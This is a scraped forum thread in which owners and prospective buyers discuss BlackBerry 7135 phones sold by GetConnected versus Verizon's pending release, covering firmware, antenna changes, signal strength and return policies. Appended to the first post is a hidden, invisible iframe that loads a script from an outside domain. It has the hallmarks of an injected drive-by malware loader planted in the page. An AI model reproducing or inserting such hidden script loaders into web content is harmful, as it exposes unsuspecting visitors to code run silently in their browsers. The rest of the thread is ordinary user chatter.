+ Reply to Thread

Thread: Verizon changes

Verizon changes

Does anyone know if the 7135's presently being tested by Verizon have the same firmware versions as the phones being sold by GetConnected?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't konw for sure but chances are that somethings different.. most likely firmware. If they are still testing then they are probably changing the firmware and testing again. Check out the Release date/rumors thread. Seems like one person a day says "they make changes and need two more weeks to test."

Hopefully it is just firmware and not hardware. That's be worse
    iPhone therefore iAm.

I've heard that they are currently changing the antenna. While this is a hardware change, it sounds like something that would be swappable into the existing phones. If my new non-VZ 7135 gives me problems I'll wait until they finally release it, then take it in and get it fixed to their specs.
    Sorry, but I no longer make 7135 headset adapters.

Originally posted by coolcat
    I've heard that they are currently changing the antenna. While this is a hardware change, it sounds like something that would be swappable into the existing phones. If my new non-VZ 7135 gives me problems I'll wait until they finally release it, then take it in and get it fixed to their specs.
    I think you may be right about the antenna. I spoke to the store manager of a Verizon store last night and in response to my question regarding the downside of purchasing a "GetConnected" phone, he said "we wouldn't service that phone. For example if you need to fix the antenna, we wouldn't replace it." It may be a coincidence that he mentioned the antenna, or it may not. The distressing thing is that he made a point of saying they would not fix it. However, I'm sure for a fee they probably would.

The antenna issue has been brought up before, I think it was something about its size. I wonder why we havent heard anything about the altel phones having any receptoin issues.

Any 7135 owners having signal troubles yet? I think we need a side by side signal comparasion to a 6035 signal meter. The phones may differ, but they are the closest in operation so I'm curious now if there are any signal performance differences. Thanks in advance!
    iPhone therefore iAm.

Originally posted by Steve
    The antenna issue has been brought up before, I think it was something about its size. I wonder why we havent heard anything about the altel phones having any receptoin issues.

Any 7135 owners having signal troubles yet? I think we need a side by side signal comparasion to a 6035 signal meter. The phones may differ, but they are the closest in operation so I'm curious now if there are any signal performance differences. Thanks in advance!
    There have been some people who reported signal issues (I think CloudyI returned his phone for that reason). I haven't had any signal problems with my 7135.

Originally posted by davemayo
    There have been some people who reported signal issues (I think CloudyI returned his phone for that reason). I haven't had any signal problems with my 7135.
    I did have some signal issues but the reason why I returned it is because it died--probably just bad luck. I am going to wait another week and then I will probably reorder it if still not available on Verizon.

I think the problem is that it just doesn't have as good of a signal as some phones but that this probably isn't much of an issue for most people but in a state as big as Wyoming with as few people as we have the signal just isn't what it is in most areas. Anyway after being without I do indeed miss it---

Cloudy
    Did you have any problems returning to getconnected? I assume because it died that they did not charge a restocking fee.

Originally posted by brib1
    Cloudy
    Did you have any problems returning to getconnected? I assume because it died that they did not charge a restocking fee.
    No problems at all--because it died they even returned my shipping charges. If it hadn't of died though they said they would only return it it it had less than 30 minutes of talk time or an additional charge would apply although they wouldn't tell me what that charge was. I didn't press it though because it died and the point became moot.

I've never even had to extend my antenna. My reception has been just fine.

poked back in
    Awesome, Jaz, that's good news for me! Drive by 51st ST and see how good it is. Just in that area.

Originally posted by CloudyI
    I did have some signal issues but the reason why I returned it is because it died--probably just bad luck. I am going to wait another week and then I will probably reorder it if still not available on Verizon.

I think the problem is that it just doesn't have as good of a signal as some phones but that this probably isn't much of an issue for most people but in a state as big as Wyoming with as few people as we have the signal just isn't what it is in most areas. Anyway after being without I do indeed miss it---
    ? Do you know if your service area uses the 1900 level digital frequesncy? I've been told that the phone has problems with that digitial frequency vs. the 800 digital frequency which could explain your lack of signal strenght.

This is one of the problems that VZW is trying to get fixed from what I understand.